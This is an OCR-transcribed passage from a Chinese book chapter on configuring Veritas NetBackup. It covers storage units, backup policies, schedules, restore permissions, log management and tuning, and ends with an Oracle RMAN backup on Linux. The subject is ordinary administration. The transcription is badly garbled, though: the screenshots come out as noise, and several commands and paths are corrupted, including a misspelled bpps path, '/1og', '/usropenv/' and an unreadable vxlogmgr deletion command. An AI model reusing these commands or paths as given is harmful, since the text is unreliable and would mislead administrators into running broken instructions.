对 于 不 同 的 范围 的 卫 地 址 的 主机 ， 可 以 加 多 行 。 上 面 的 语句 表示 卫 地 址 从 192.168.12.1 
到 192.168.12.10 的 所 有 主机 ， 备 份 速度 限定 为 500KB/s。 
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12.3.4 创建 一 个 基本 备份 任务 
1. 添加 存储 设备 


完成 安装 和 配置 后 就 可 以 创建 备份 任务 了 , 在 这 之 前 , 要 在 MasterServer 上 先 将 用 于 备份 
的 存储 设备 加 入 设备 列表 ， 如 图 12.4 所 示 。 


Storage Units -chenguang.com - NetBackup Administration Jiogged into chenguang.com] 


BVERITAS NetBackup™ 
File Edit View Actions Help 
日 + 白 国 日 ASGYWTX 各 中 避 加 


chenguang.com Master Serven H 0 Storage Units @ selected) 


合 chenguang com Waster Server) Name [Media Ser jiorage Un ] Disk Type [Robot Typel ROboLNU | Densiy On DemandjFragment | MuniplexingjMal 
从 Backup, Archive, and Restore 
Activity Monitor 
9 凤 Nereackup Management 
© ERepons 
Policles 
© storage Units 
Caralog 
9 狗 Host Propenles - 
目 Master Servers % New Storage Unit- Ca-N 
Media Servers 人 Change 
Clients 证 
9 BB Media and Device Management oY 
加 Device Montor 团 Manual Relocation to Final Destinatlon 
昌国 Media X Delete 
© Wp Volume Pools 
-Volume croups 轩 column Layout- 
信 国 Robots So 
hl standalone a 
9 国 Devces A Ema. 
最 Drwes Fltere 


里 Robots 
请 Hosts 
时 NDMP Hosts 
Topology 
Access Management 
Vauh Management 
组 Flesystem Analyzer 
© KW Bare Metal Restore Management 


叭 | | 国 root@ chenguang:/usr/openv/netbackuplbin [® Storage Units - chenguang.com - NetBackup Admir| I | | | 
图 12.4 将 存储 设备 加 入 设备 列表 
自行 命名 后 , 将 备份 的 目标 指向 /data/backup 目录 , 可 以 查看 空间 使 用 情况 , 随后 单 击 OK 
按钮 ， 就 有 了 第 一 个 存储 设备 ， 如 图 12.5 所 示 。 
1Storage Units (0 selected) 


Name Media Serv..jStorage Uni.」 Disk Type 
图 LocalDisk yeritas Disk BasicDisk 


Robot Type |Robot Num...l 二 Densi 


图 12.5 创建 第 一 个 存储 设备 
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2. 创建 一 个 最 简单 的 备份 策略 


在 NetBackup 管理 界面 左 侧 菜 单 中 ， 鼠 标 右 击 Policies 选项 ， 打 开 的 菜单 如 图 12.6 所 示 。 
在 其 中 选中 Add new policy 选项 。 


[es Backup, Archive, and Restore 


Activity Monitor 
? 外 Netseap Management 压 E New Client.. 
~ 国 Reports ps 
加 Polcies | New Backup Selection... 
? Storage 届 Insert... Insert 
图 Storage Units X Delete Delete 
[a 
WB Storage Unit Groups Cn 
区 3toraye Lifecycle Policies 
喇 Catalog 部 copyTo New... 
人 Host Properties ycut 2 
? Media and Device Management a 
Device Monitor 四 Copy Se 
国 Media 杞 Paste Ch-V 
车 Devices [加 Refresh i 
地 鳃 Credentials 
Access Management Activate 
地 贸 vaultManagement Deactivate 
他 向 Bare Metal Restore Management Manual Backup... 
Install UNIX Client Software... 


人 可 
图 12.6 创建 一 个 新 的 备份 策略 


Add new policy 界面 如 图 12.7 所 示 ，Policy type 是 备份 类 型 ， 有 针对 各 个 操作 系统 或 数据 
库 的 ， 普 通 文件 备份 选择 Standard 即 可 。 在 Policy volume 里 ， 可 以 选择 刚 创 建 的 存储 设备 。 
若是 普通 备份 则 在 右边 取消 色 选 Bare Metal Restore，BMR 一 般 用 于 备份 操作 系统 并 进行 裸 机 
恢复 。 


图 httributes | 区 Schedules | 可 Clients | 男 Backup Selections 


Active. Go into effect at: 
Follow NFS 
TDestination: OD 


i 口 cross mount points 
Data classific... la classificat... vw 口 ee 


Policy storage: «|Any_available 口 Encryt 
Policy volume ... ollect disaster recovery information for 
LocalDisk LJintelligent Disaster Recovery 


a LBare Metal Restore 
ch 二 es Collect true image restore informatior 


Policy type: Standard v 


图 12.7 Add new policy 界面 
(1) Schedules 选项 卡 ， 如 图 12.8 所 示 ，Type of backup 有 5 个 选项 ， 作 用 说 明 如 下 。 


@ Full Backup: 即 全 备份 ， 将 所 有 要 备份 的 文件 每 次 都 全 部 备份 一 次 。 
®@ Differential Incremental Backup: 差异 备份 ， 和 全 备份 组 合 使 用 ， 即 每 次 都 备份 自 上 一 
次 全 备份 以 来 产生 的 所 有 不 同文 件 。 假 如 全 备份 后 ， 进 行 了 十 次 差异 备份 ， 如 果 要 恢 
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复 到 最 新 ， 需 要 用 到 全 备份 数据 和 最 后 一 次 的 差异 备份 数据 。 


@ Cumulative Incremental Backup: 增 量 备 份 ， 和 全 备份 组 合 使 用 ， 每 次 备份 上 一 次 备份 
以 来 (全 备份 、 差 异 备份 、 增 量 备份 ) 产生 的 不 同文 件 。 假 如 全 备份 后 ， 进 行 了 10 
次 增 量 备份 ， 如 果 要 恢复 到 最 新 ， 需 要 用 到 全 备份 数据 和 10 次 所 有 的 增 量 备份 数据 。 


@ User Backup: 用 户 备份 ， 可 以 从 客户 端 启动 的 备份 。 


@ User Archive: 用 启 归档 ， 可 以 从 客户 端 启动 的 备份 ， 但 备份 完成 后 ， 删 除 掉 客 户 端 上 


备份 的 文件 。 


@ Schedule type 有 2 个 选项 : Calendar, 可 以 用 天 , 周 , 月 详细 定义 备份 的 时 间 。 Frequency， 
备份 频率 ， 即 多 长 时 间 备 份 一 次 。 这 里 建立 一 个 的 Full Backup。 


国 Attributes | 网 Schedules | 可 Cients | 国 Backup Selections | 


回 Aaa Schedule - Policy FileBk 


itas.ora 


® Start Window | ® Exclude Dates 


区 ) WIED Medial 


_ -Destination: 


口 Multiple copies Configure. 


口 Override policy storage selection: 


到 


口 Override policy volume poot: 


口 Retries allowed after runday 口 override media owner: 


® Frequency: 


es Ra 


7 wepks 


DD | 


产 New- 


X Delete ] Change- 


图 12.8 “Add Schedule” 界 面 


(2) Start Windows 选项 卡 : 备份 开始 的 时 间 ， 以 周 为 单位 设置 。 后 面 的 Exclude Dates 


即 排除 时 间 。 
(3) Clients 选项 卡 : 选择 客户 端 名 字 和 系统 类 型 。 


(4) Backup Selections 选项 卡 : 选择 要 备份 的 文件 ， 此 处 添加 一 个 /boot 目录 ， 如 图 12.9 


所 示 。 
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1 下 I | 


New.. 国 msent X Delete ‘change, | 


[eee | Ge] 


图 12.9 添加 了 一 个 /boot 目录 


3. 运行 测试 

新 建 的 任务 上 单 击 右键 手动 运行 ， 进 入 Activity Monitor 后 可 看 到 正在 运行 的 任务 ， 如 图 
12.10 所 示 。 蓝 色 表示 成 功 ， 绿 色 表示 正在 运行 ， 黄 色 表 示 有 和 警告 ， 红 又 表示 失败 。 如 果 失 败 
并 且 报 23 或 48 的 错误 ， 原 因 很 可 能 是 主机 或 客户 端的 /etc/hosts 文件 没有 添加 对 方 的 相应 信 


息 。 


| 2 Jobs (0 Queued 1 Active 0 Waiting for Retry 0 Suspended 


E] Yeritas.ora (Master Serven) 蕊 
者 Backup, Archive, and Restore 
Ef 和 


tor 
?+ 加 Management 
9 图 Reports 
©@ tatus of Backups 
加 Client Backups 
A@ Problems 


图 12.10 Activity Monitor 中 正在 运行 的 任务 


E 50 Backup 
内 49 Backup 


12.3.5 “管理 NetBackup 
1. 管理 NetBackup 进程 
用 bpps 查看 NetBackup 目前 正在 运行 的 进程 : 
/usr/opev/NetBackup/bin/bpps -a 


2. 管理 Client 备份 数据 的 恢复 
在 默认 方式 下 ， 每 个 Client 只 能 恢复 自己 备份 的 数据 ， 但 可 以 通过 设 定 将 该 限制 去 掉 。 


(1) 使 每 个 Client 都 可 以 恢复 其 他 所 有 Client 的 备份 。 在 Master Server 上 ， 创 建 下 面 
的 文件 : 
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/usr/openv/NetBackup/db/altnames/No.Restrictions 


(2) 仅 使 某 个 确定 的 Client 可 以 恢复 其 他 所 有 Client 的 备份 。 在 Master Server 上 ， 创 
建 下 面 的 文件 。 


/usr/openv/NetBackup/db/altnames/Client Name 
其 中 Client Name 是 那个 想 要 恢复 其 他 Client 备份 的 客户 端的 机 器 名 。 


(3) 只 允许 客户 端 Client A 恢复 指定 的 客户 端 Client B 的 备份 数据 .在 Master Server 上 ， 
创建 下 面 的 文件 。 


/usr/openv/NetBackup/db/altnames/Client A 


并 将 Client B 作为 文件 Client A 的 内 容 写 入 该 文件 中 ， 其 中 Client A 和 Client B 都 是 客 
户 端的 机 器 名 。 

3. 管理 负载 平衡 

可 以 采用 以 下 方法 进行 负载 平衡 的 调整 : 
调整 Server 的 负载 。 调 整 Maximum Jobs per Policy， 来 改变 备份 服务 器 的 负载 。 
在 特定 的 时 间 内 调整 Server 的 备份 负载 。 改 变 Schedule 的 时 间 段 。 
调整 Client 的 备份 负载 。 改 变 Maximum Jobs per Client 来 调整 Client 的 备份 负载 。 
减少 Client 的 备份 时 间 。 使 用 Multiplexing 或 增加 Maximum Jobs per Client 的 值 。 
调整 Policy。 改 变 Maximum Jobs per Policy 或 Policy 的 优先 级 。 
调整 高 速 和 低速 网 络 的 负载 平衡 . 调整 Maximum Jobs per Policy 或 Maximum Jobs per 
Client。 
@ 最 大 限度 地 利用 驱动 器 。 使 用 Multiplexing， 并 允许 每 一 个 Storage Unit 可 以 同时 执行 

多 个 任务 。 


4. 日 志文 件 的 管理 


NetBackup 所 有 统一 日 志 都 写 入 /usr/openv/logs 目录 ， 下 面 尝 试 更 改 日 志文 件 的 位 置 ， 统 
一 日 志 记录 文件 会 占用 大 量 的 磁盘 空间 。 如 果 需 要 ， 可 以 将 其 定向 至 其 他 位 置 log)〉。 
要 将 统一 日 志 定向 至 其 他 文件 系统 ， 可 以 使 用 以 下 命令 : 


/usr/openv/NetBackup/bin/vxlogcfg -a -p NB -o Default -s LogDirectory=/1og 
使 用 vxlogmgr 命令 可 管理 统一 日 志 记录 文件 ， 例 如 移动 或 删除 日 志 。 


# /usr/openv/NetBackup/bin/vxlogmgr -s -o nbrb 

Following are the files that were found: 
/usr/openv/logs/51216-118-16844033-110731-0000000000.1og 
/usr/openv/1logs/51216-118-16844033-110801-0000000000.1og 

Total 2 file(s) 
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删除 NetBackup 在 最 近 15 天 内 创建 的 统一 日 志文 件 : 
VELOGMGILE =d ~“prodid S1216°=n] 15 
5. 使 用 命令 行 方式 


有 些 时 候 由 于 网 络 条 件 限制 , 无 法 启动 远 端 图 形 界 面 , 这 个 时 候 命 令 行 工 具 就 显得 尤为 重 
要 。 简 单 看 一 下 bpadm 的 功能 ， 如 图 12.11 所 示 。 


NetBackup Server: veritas 


NetBackup Administration 


Storage Unit Management... 
Storage Unit Group Management... 
Policy Management... 

Global Configuration... 
Reports... 

Manual Backups... 

Special Actions... 


User Backup/Restore... 
Media Management... 
Help 

Quit 


ENTER CHOICE: 


图 12.11 bpadm 功能 界面 


从 上 面 功能 界面 中 可 以 看 到 ， 基 本 上 jnbSA 的 功能 在 bpadm 中 都 包括 了 ， 命 令 行 唯一 比 
较 差 的 是 缺少 实时 监控 的 功能 。 

不 过 通过 Reports 命令 也 可 以 实现 其 中 部 分 功能 ,如 果 遇 到 困难 可 以 先 查询 日 志 /usropenv/ 
NetBackup/logs/user_ops/nbjlogs/， 然 后 再 使 用 搜索 引擎 寻求 答案 。 


12.3.6 ”优化 措施 


1. 理 顺 备份 流程 ， 减 少 备份 策略 ， 统 一 备份 时 间 


理 顺 备份 流程 , 应 根据 不 同 的 备份 需要 制定 不 同 的 备份 策略 , 备份 策略 名 应 清晰 地 反映 出 
备份 涉及 的 范围 和 目的 。 如 主机 的 系统 备份 ， 备 份 策略 名 可 以 使 用 主机 名 +system 方式 命名 ; 
但 对 于 Oracle 数据 库 备 份 策略 , 则 应 使 用 数据 库 特 征 字符 (如 SID 等 ) +Oracle 的 方式 来 命名 ， 
这 种 方式 要 比 上 一 种 命名 方式 更 清晰 明了 , 而 且 不 管 以 后 数据 库 切 换 到 哪 台 机 器 上 , 它 的 备份 
策略 名 都 是 唯一 不 变 的 ， 对 维护 人 员 来 说 ， 这 样 的 命名 方式 既 清晰 ， 也 便于 记忆 。 

随 着 加 入 SAN 环境 机 器 数量 的 增加 ， 相 对 应 的 备份 策略 也 不 断 增加 ， 数 目 过 多 的 备份 策 
略 ， 既 增加 了 管理 的 难度 ， 也 增加 了 运行 人 员 的 检查 工作 量 ， 容 易 导 致 监控 中 经 常 出 现 误 报 、 
漏 报 的 情况 。 针 对 这 种 情况 , 可 将 备份 策略 按 其 相关 性 进行 分 类 ， 适当 地 对 同一 类 备份 策略 进 
行 归并 整合 ， 从 整体 上 减少 备份 策略 的 数目 。 如 对 同一 Oracle 数据 库 的 全 备份 和 增 量 备份 ， 
应 使 用 同一 个 备份 策略 ， 通 过 定义 不 同 的 Schedule 来 区 分 全 备份 和 增 量 备份 ， 统 一 在 每 天 的 
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固定 时 间 段 进行 备份 ， 以 便于 监控 和 记忆 。 


2. 合理 分 配备 份 窗口 ， 减 少 备份 冲突 


备份 会 占用 主机 大 量 的 CPU 时 间 ， 因 此 为 了 不 影响 正常 的 联机 交易 性 能 ， 备 份 一 般 都 会 
选择 在 晚上 20 点 与 凌晨 6 点 之 间 的 时 间 段 执行 。 随 着 备份 任务 的 增多 ， 备 份 窗口 也 会 越 来 越 
紧张 ， 对 此 , 应 根据 总 体 备 份 策略 按 周 期 建立 备份 时 刻 表 , 将 每 天 备份 策略 的 计划 开始 时 间 和 
用 时 情况 用 彩色 单元 格 标注 在 表 上 ， 通 过 图 形 显示 ， 可 以 非常 清晰 地 反映 出 备份 的 总 体 情 况 ， 
然后 根据 此 表 对 备份 策略 进行 调整 ， 以 保证 在 预 留 1~2 个 磁带 机 作 备 用 的 情况 下 ， 同 时 使 用 
的 磁带 机 数 不 会 多 于 磁带 机 的 总 数 。 

如 备份 时 间 确 实 存在 冲突 , 也 可 以 按照 应 用 的 重要 性 将 系统 进行 分 类 , 调整 备份 的 方式 或 
将 备份 的 周期 延长 , 如 将 数据 库 的 增 量 备份 改 为 只 对 归档 日 志 进 行 备份 , 全 备份 由 一 周一 次 调 
整 为 两 周一 次 ; 再 如 延长 系统 备份 为 两 周一 次 , 通过 减少 备份 次 数 ， 可 以 缓解 备份 存在 冲突 的 
情况 。 


3. 充分 挖掘 系 统 性 能 ， 提 高 备份 速度 


对 于 Client 服务 器 的 备份 ， 数 据 需 要 经 过 LAN 到 master 或 media 服务 器 再 写 入 磁带 机 。 
如 果 数 据 量 较 大 (如 几 十 G 的 大 型 数据 库 ) ，LAN 将 会 成 为 备份 的 瓶颈 ， 从 而 影响 备份 的 速 
度 。 此 时 应 考虑 将 数据 迁 入 SAN 环境 , 部署 成 media 服务 器 , 通过 LAN-FREE 方式 进行 备份 ， 
充分 利用 光纤 通道 的 高 速度 和 SAN 存储 设备 的 高 性 能 ， 实 现 快速 备份 ， 减 少 备份 时 间 。 

对 于 media 服务 器 的 备份 ， 如 果 数 据 量 较 大 (如 数据 仓库 ) ， 则 应 使 用 多 数据 流 

(Multi-stream) 方式 进行 备份 。 为 达到 最 好 的 备份 效果 ， 应 首先 将 不 同 的 多 数据 流 所 备份 的 

文件 系统 ， 分 布 到 SAN 存储 设备 的 不 同 RAID 组 中 ， 以 减少 多 数据 流 备份 之 间 的 IO 争 用 ; 
然后 将 所 备份 的 文件 系统 分 成 多 路 同时 写 入 2 个 或 2 个 以 上 的 磁带 机 , 从 而 提高 备份 速度 , 减 
少 备份 时 间 。 

任何 服务 器 的 备份 时 间 ， 都 应 尽量 与 该 服务 器 的 crontab 定时 作业 、 批 量 的 时 间 错 开 ， 减 
少 可 能 造成 的 “热点 ”IO 争 用 。 这 样 一 来 ， 定 时 作业 和 备份 对 物理 硬盘 的 访问 会 分 散 到 不 同 
的 时 间 段 执行 ， 既 能 加 快 备份 的 速度 ， 也 有 利于 定时 作业 、 批 量 等 任务 的 快速 完成 。 

服务 器 之 间 的 备份 时 间 也 应 尽量 错开 ， 尤 其 是 在 SAN 存储 设备 的 同一 RAID 组 都 具有 
LUN 的 备份 作业 ， 从 而 减少 多 个 备份 作业 对 同一 RAID 组 的 LUN 之 间 的 IO 资源 争 用 。 

应 密切 关注 备份 的 运行 情况 ,根据 运行 情况 , 确定 备份 存在 的 主要 问题 , 然后 再 相应 地 调 
整 系统 的 参数 ， 以 提高 备份 的 速度 。 如 在 bpbkar 日 志 中 出 现 信 息 waited for full buffer 142155 
times，delayed 162825 times， 则 说 明 出 现 了 bptm 有 大 量 时 间 在 等 待 data buffer 填 满 的 情况 ， 
此 时 可 尝试 对 NetBackup 的 data buffer 的 大 小 进行 减 小 或 增加 。 再 如 对 大 数据 量 的 备份 ,可 以 
通过 调整 操作 系统 参数 ， 如 增 大 系统 的 vmtune 预 读 页 数 、 增 大 网 卡 接收 缓冲 区 的 大 小 等 措施 
进行 优化 。 参 数 更 改 后 ， 应 通过 观察 备份 的 效果 ， 再 决定 是 否 采取 更 进一步 的 优化 措施 。 本 节 
对 VERITAS NetBackup 的 关键 配置 和 管理 做 了 较为 详尽 的 阐述 ， 为 使 用 该 备份 管理 软件 的 用 
户 提供 了 一 些 可 以 借鉴 的 知识 点 ， 从 而 更 好 地 帮助 企业 完成 数据 备份 工作 。 
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12.4 运用 NetBackup 进行 Oracle 备份 和 恢复 


本 节 详 细 描 述 了 Linux 平台 下 用 NetBackup 进行 Oracle 备份 和 恢复 的 全 过 程 。 由 于 生产 
环境 的 操作 系统 是 64 位 的 RHEL 5.5, 所 以 NetBackup 只 能 装 64 位 版 ,而 数据 库 采用 的 是 Oracle 
10g R2 for Linux_x64 的 软件 包 ， 其 数据 文件 都 存储 在 ASM 中 。 这些 软件 的 安装 我 们 已 在 前 面 
章节 提 到 。NetBackup 的 服务 器 端 、 客 户 端 以 及 媒体 服务 器 都 在 同一 台 主 机 上 

(oradb.xzxj.edu.cn) 。 在 安装 NetBackup 6.5 过 程 中 ， 注 意 ， 数 据 库 的 agent 不 需要 额外 再 单 
独 安装 ， 安 装 客户 端 以 及 服务 器 端 时 默认 已 经 安装 了 ， 只 需要 以 oracle 身份 执行 oracle_ links， 
将 RMAN 和 NetBackup 结合 在 一 块 即 可 。 以 下 主要 对 备份 和 恢复 进行 详细 描述 。 


12.4.1 备份 过 程 


在 备份 之 前 要 创建 一 个 适用 于 Oracle 的 策略 ， 否 则 无 法 进行 备份 ， 至 于 如 何 创建 策略 ， 
可 以 参考 官方 文档 。 这 里 已 经 创建 了 一 个 策略 orabak, 此 策略 类 型 是 Oracle, 如 图 12.12 所 示 。 


i 


图 12.12 Oracle 策略 类 型 


创建 完成 后 在 页 面 中 存在 一 个 名 为 Default-Application-Backup 的 默认 日 程 , 如 图 12.13 所 
示 ， 可 以 在 日 程 选项 里 进行 新 增 、 删 除 、 更 新 日 程 等 操作 。 这 里 不 进行 策略 设置 ， 默 认 日 程 是 
能 够 满足 测试 的 。 


图 12.13 Default-Application-Backup 默认 日 程 
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注意 : jnbSA 程序 是 NetBackup 的 管理 窗口 ,而 jbpSA 是 客户 端 进行 备份 、 恢 复 、 归 档 操 
作 的 窗口 。 要 进行 Oracle 的 备份 ， 必 须 以 oracle 用 户 运行 jbpSA 命令 。 


登录 成 功 后 会 看 到 如 图 12.14 所 示 的 界面 : 


Eile Edi View Actions Help 


NetBackup Server 
oradb xzxj edu. cn 


Source dient Destination dient 
oradh wrvjedu mn Oradh yr 


adb xrxj edu rn 
Backup Files | Restore Files | Task Progress | 
Directory Structure ] 
”Or/ 
Dron 
小 目 上 Lous Notes 
?加 也 Oracle 
* 句 日 枉 吕 
~ MA Tablespares 
回国 Arcnived Logs 
“回国 Datafiles 
e 目 多 Users 
回国 D82 


Policy type 
Standard ba 


图 12.14 登录 成 功 界面 
选中 要 备份 的 数据 库 实 例 ， 这 里 只 有 一 个 db01 实例 ， 然 后 单 


f 右 下 角 的 Backup 按钮 ， 
会 弹出 NetBackup for Oracle backup 向 导 界 面 ， 如 图 12.15 所 示 。 


Welcome to the NetBackup for Oracle RMAN Template Generation Wizard. 
This wizard solicits information used for performing Oracle RMAN backups. 


Completing the wizard produces a template that can be used to perform automatic scheduled 
backups or manual user- directed backups. 


The wizard supports most backup scenarios, however, some capabilities offered by the RMAN 
script language are not available through the wizard. 


图 12.15 NetBackup for Oracle backup 向 导 


根据 向 导 提示 ， 单 击 Next 按钮 (图 12.15 中 未 给 出 参看 实际 界面 ) ， 进 入 如 图 12.16 所 示 
的 界面 。 这 里 选择 认证 方式 , 有 OS 认证 以 及 Oracle 认证 , 如 果 是 OS 认证 , 则 NBU 会 以 oracle 
身份 运行 相关 命令 ， 因 为 之 前 登录 的 用 户 就 是 Oracle。 如 果 是 Oracle 认证 ， 则 User Name 必 
须 是 具有 sysdba 权限 的 数据 库 用 户 ， 一 般 就 是 sys 用 户 。 


Target Database Logon Credentials 
Specify the target database logon credentials. 
© 0 Authentication 
® Oracle Authentication 


Oracle Logon Credentials 
User name: 


Net service name (TNS Aliasy: 


DUse Oracle RMAN recovery catalog 


图 12.16 选择 认证 方式 
Net service name 是 可 选 的 。 单 击 Next 按钮 ， 进 入 如 图 12.17 所 示 的 界面 。 
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Archived Redo Logs 
Specify archived redo log options. 


include archived redo logs in backup 
Archiveq Reqo Log Opuons 
全 Ad rede logs 
CRede logs in speafied date range 
Date Range 
回 Pmm 


四 Untit 


图 12.17 Archived Redo Logs 界面 
保留 默认 配置 即 可 ， 单 击 Next 按钮 ， 进 入 如 图 12.18 所 示 的 界面 。 


Backup Options 
Specify the backup filename format and optionally add an ID for the backup set9. 


Unique identifiers are required for each backup piece. The backup file name format provided 
ensures unique identifiers. This format does not need to be changed unless a custom format is 
desired. 


Backup file name format: 
|bk-uxu_sxs-pkp_tM ] 


Backup set identifier 


图 12.18 ”Backup Options 界面 


这 里 指定 备份 文件 的 格式 ， 默 认 即 可 ， 单 击 Next 按钮 ， 进 入 如 图 12.19 所 示 的 界面 。 


Database State 
Choose to stop and start the database. 


A cold backup requires that the database be offline The database can be automatically taken 
offline prior to the start of the backup. 


DITake the database OFFLINE BEFORE the backup starts. 
DBring the database ONLINE AFTER the backup completes. 


Onacle database initalization parameter file: 


图 12.19 ”Database State 界面 


这 里 配置 的 是 在 线 热 备份 ， 所 以 保留 默认 即 可 ， 单 击 Next 按钮 ， 进 入 如 图 12.20 所 示 


的 界面 。 


NetBackup Configuration Variables 
Provide values specific to this backup for the following configuration variables. 


NetBackup normally executes a backup using defined configuration information from policy 
definitions and configuration files. However, in some environments, it may be necessary to set 
certain configuration variables when a backup is started 


Any variables set below will be used during the backup and their values will have precedence over 
any previous setting. 


Backup policy name: Server name: 
[orabak ] Joradb 
Schedule name: Client name: 
[Defaun-Application-Backup loradb 


图 12.20 ”NetBackup Configuration Variables 界面 


这 里 需要 手工 输入 备份 策略 名 、 日程 名 、 服 务 器 端 名 称 以 及 客户 端 名 称 。 由 于 这 里 的 服务 
器 端 、 客 户 端 以 及 数据 库 都 在 同一 台 机 器 上 ,所 以 服务 器 端 名 称 和 客户 端 名 称 是 一 样 的 。 配 置 


完成 后 ， 单 击 Next 按钮 ， 进 入 如 图 12.21 所 示 的 界面 。 
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Backup Limits 
Modify the default 1/O0 and backup set limits used by RMAN. 


© Use RMAN defaults for maximum limits 
© Specify maximum limits 


Maximum MO Limits Maximum Backup Set Limits 

Read rate (Kblocks/seD: Number of files per backup set: 

Size of a backup plece (KE): Slze of the backup setKB) 

Number of open files: Size of the backup set for archived logs(KE): 
1/0 Output 


Number of parallel streams: 


12.21 Backup Limits 界面 
这 里 使 用 RMAN 默认 的 设置 即 可 ， 单 击 Next 按钮 ， 进 入 如 图 12.22 所 示 的 界面 。 


Template Summary: 
Backup file name format for archived logs: 
arch_u%u_s%s_p%p_tt 


# Backup Objects 


All archived logs 
WHOLE DATABASE 


DPerform backup immediately after wizard finishes 
口 Save Template 
Template Information 

Template name; 


Description: 


User name for scheduled backup(sy: 


图 12.22” ”Template Summary 界面 


这 里 选中 perform backup immediately after wizard finishes， 然 后 单 击 右 下 角 的 Finish 按钮 即 可 
开始 备份 ， 如 图 12.23 所 示 。 


Ee Edit View Acions He 


NetRackup cerver: Sourre dlien Drsunation chent 


Policy type 
omgbxeoumn oadoxryedun oadb. sw, edt.ch Stangard 到 局 | 
[Eap Pies | Rostore Fies Tisk Progress 
Tasks Performed | 
Task Dae ET 


国 backup Det 4, 2010 42808 PM Sucressful Delewe 


国 Backup Det4 2010 7:43:21 PM Surtessful 
Da5 2010 9:53:29 AM | 


Results of the Task Selacted Above 


auto Rarresh mate Geco 


INF — CURRENT CONTROLFILE 

INF - RELEASE CHANNEL ch0G 

INF -上 

INF ~ End of Recovery Manager input 
INF - stat of Recovery Manager oatput 


del 1 回 FiiCantana 


图 12.23 执行 备份 界面 
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单 击 Task Progress 选项 卡 可 查看 备份 的 实时 过 程 以 及 备份 输出 日 志 。 在 NetBackup 管理 
窗口 ， 可 以 单 击 Activity Monitor 查看 活动 的 工作 ， 如 图 12.24 所 示 ， 有 一 个 Job 1d 是 147 的 


正 处 于 活动 状态 ， 在 类 型 栏 里 可 以 看 到 正在 备份 。 


Eile Edit View Actions Help 
SI EC TA 


oradbxzxj.edu.cn NasterServen 


oradb xzX) edu.cn (Master Server) 
Backup, Archive, and Restore 


State Details 


站 晶 Neteackup Management ES 
~ 国 Repons 炎 。 145 calalog Bac 
Policies 144Catalog Bac... Done 
+ 国 sorape 兴 “143 caalog Bar” Done 
Cutateg W142 Catalog Bac... Done 
mba Wl4lRestore Done 
$Media and Device Management 党 
140 Restore Done 
Device Monitor 
号 Media 六  1l39Restore Done 
局 Devices 淡 138Restore Done 
> 多 credentials W137Image Clea Done 
Access Management 久 136 Backup Done 
他 多 vaurt Management W135 Restore Done 
> 抱 Bare Metal Restore Management | | 党 134Restore Done 
兴 133Backup Done 
炎 132 Backup Done 
兴 131Backup Done 
130Image Clea.. Done 
炎 129 Backup Done 
127Image Clea.. Done 
125 Media Erase Done 


Onbu-_catal 
Onbu-_catal 
Onbu-catal 
Onbu-catal 
0 


0 
0 
0 
0 


Oorabak 
0 
0 
Oorabak 
Oorabak 
Oorabak 
0 
Oorabak 
0 
0 


Schedule 


Differential 
Dirferential 
Differential 


Default-A| 


Defauh-A| 
Default-A| 
Defauh-A| 


Defauh-A| 


mm 


ol 


图 12.24 Activity Monitor 


单 击 Job Id 可 以 查看 备份 的 详细 过 程 ， 如 图 12.25 所 示 。 


Job ID: 147 Job state: Done 


[Job Overview | Detailed Status 


Attempt: Attempt started: Oct 5, 2010 9:53:48 AM 
Job PID: 15295 Attempt elapsed: 00:03:17 


Storage unic oradb-hcart-robot-tld-1 Attempt ended: Oct 5, 2010 9:: 


Media server ”oradb KB per second: 3284 


Transport type: LAN 


7:05 AM 


Status: 

Oct 5, 2010 9:53:49 AM - connecting 

Oct 5, 2010 9:53:56 AM - connected; connecttime: 0:00:00 

Oct 5, 2010 9:53:57 AM - mounting 1007L4 

Oct 5, 2010 9:54:06 AM - mounted 1007L4; mount time: 0:00:09 
Oct 5, 2010 9:54:06 AM - positioning 1007L4 to file 3 

Oct 5, 2010 9:54:06 AM - positioned 1007L4; position time; 0;00;00 
Oct 5, 2010 9:54:06 AM - begin writing 

Oct 5, 2010 9:56:56 AM - end writing; write time: 0:02:50 

the requested operation Was successfully completed (0) 


Current Kilobytes written: 556064 Estimated Kilobytes: 
1 


Current Files written: Estimated Files: 


Current File: 


Troubleshoote 


图 12.25 备份 详细 过 程 


备份 完成 后 ， 在 备份 、 恢 复 、 归 档 窗口 会 显示 备份 已 经 成 功 ， 如 图 12.26 所 示 。 


Destination qien 
oradbxpd.edu.n 


Poliey ype: 
Standard 


se Dd 
Backup Oct 4, 2010 4:28:08 FM Successful 
Backup Oct 4, 2010 7:43:21 FM Successful 
(Oct 5, 2010 9:53:29 AM Successfu 


Results of the Task Selected Above 


10 


Ke 口 Aute Refresh Rate Geconds 


四 Fun Contents 


INF - Starting Oracle Recovery Manager 


INF - Begin progress logging for process: Q5153) 
INF - Using policy orabak to perform a user directed Oracle Stream Based backup. 


INF - Using: /u01/app/oracle/ product/ 10.2.0/ db_1/bin/rman 
INF - Connection info: target 'sys/™**** nocatalog 


[a 


4 


4 


12.26 备份 成 功 提示 界面 


这 里 运行 的 RMAN 脚本 如 下 所 示 : 
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[NF - # Control file backup 

[NF - ALLOCATE CHANNEL ch00 

[NF — TYPE 7SBT TAPE'; 

[NF - SEND 'NB ORA CLIENT=oradb,NB ORA POLICY=orabak,NB ORA SERV=oradb, 
NB_ORA SCHED=Default-Application-Backup'; 

[NF BACKUP 

[NF - FORMAT "ctr1_ u%u s%s p%p ts%t" 

[NF - CURRENT CONTROLFILE; 

[NF RELEASE CHANNEL ch007 

Lye = 


执行 完成 之 后 ， 可 以 使 用 bplist 命令 查看 备份 后 的 文件 名 称 ， 查 看 结果 如 下 所 示 。 


[root@oradb ~]# cd /usr/openv/NetBackup/bin/ 
[root@oradb bin]# ./bplist -C oradb -t 4 -R -1/ 


二 WMS Oracle oinstall 7340032 Oct 05 09:59 
/ctrl u2blpm67n s75 pl t731584759 

OLache oinstall 28573696 ”Oct 05 09:58 
/arch u2alpm665 s74 pl t731584709 

IW LH Oracle oinstall 7340032 Oct 05 09:57 
/bk_u291pm63q s73_pl t731584634 

人 oracle oinstall 569376768 Oct 05 09:53 
/bk_u281pm5t6 s72 pl t731584422 

LW- PW==== OrACEe oinstall 262144 Oct 04 21:31 /27lpkqdb 1 1 

EW OFACle oinstall 7340032 Oct 04 19:42 
/ctrl u261lpkk15 s70_pl t731533349 

区 oracle oinstall 12320768 ”Oct 04 19:41 
/arch u251lpkjvjij_s69 pl t731533299 

ee oinstall 7340032 Oct 04 19:40 
/bk_u241pkjt1_s68_pl t731533237 

9 oracle oinstall 566755328 Oct 04 L938 


/bk_u231pkjp4_s67_pl t731533092 
[root@oradb bin]# 


